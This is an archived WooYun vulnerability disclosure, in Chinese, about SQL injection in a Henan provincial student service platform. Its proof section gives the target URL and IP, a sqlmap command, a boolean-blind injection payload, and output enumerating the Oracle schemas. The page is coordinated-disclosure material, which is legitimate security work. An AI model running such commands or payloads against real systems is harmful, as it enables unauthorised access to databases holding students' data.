当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-064949

漏洞标题:某省高中生服务平台存在SQL注射

相关厂商:河南省教育厅

漏洞作者: Kuuki

提交时间:2014-06-16 17:31

修复时间:2014-07-31 17:32

公开时间:2014-07-31 17:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-16: 细节已通知厂商并且等待厂商处理中
2014-06-21: 厂商已经确认,细节仅向厂商公开
2014-07-01: 细节向核心白帽子及相关领域专家公开
2014-07-11: 细节向普通白帽子公开
2014-07-21: 细节向实习白帽子公开
2014-07-31: 细节向公众公开

简要描述:

....

详细说明:

偶然看见朋友从这个网站查学业水平测试成绩
遂简单测试一番...
注射点
“http://218.29.79.80/senior/policy/?type=02”

漏洞证明:

C:\Users\H-Kuuki>sqlmap.py -u "http://218.29.79.80/senior/policy/?type=02" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws. Developer
s assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:11:26
[21:11:26] [INFO] resuming back-end DBMS 'oracle'
[21:11:26] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: type
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=02' AND 6644=6644 AND 'GflB'='GflB
---
[21:11:27] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
[21:11:27] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart
to database names on other DBMSes
[21:11:27] [INFO] fetching database (schema) names
[21:11:27] [INFO] fetching number of databases
[21:11:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' fo
r faster data retrieval
[21:11:27] [INFO] retrieved:
[21:11:28] [WARNING] reflective value(s) found and filtering out
3
[21:11:33] [INFO] retrieved: SEMIS
[21:12:10] [INFO] retrieved: SYS
[21:12:34] [INFO] retrieved: SYSTEM
available databases [3]:
[*] SEMIS
[*] SYS
[*] SYSTEM
[21:13:18] [INFO] fetched data logged to text files under 'D:\sqlmap\output\218.29.79.80'
[*] shutting down at 21:13:18

修复方案:

赶紧过滤吧- -

版权声明:转载请注明来源 Kuuki@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-06-21 12:49

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发经青海分中心,由其后续联系网站管理单位处置。按信息泄露风险评分,rank 12

最新状态:

暂无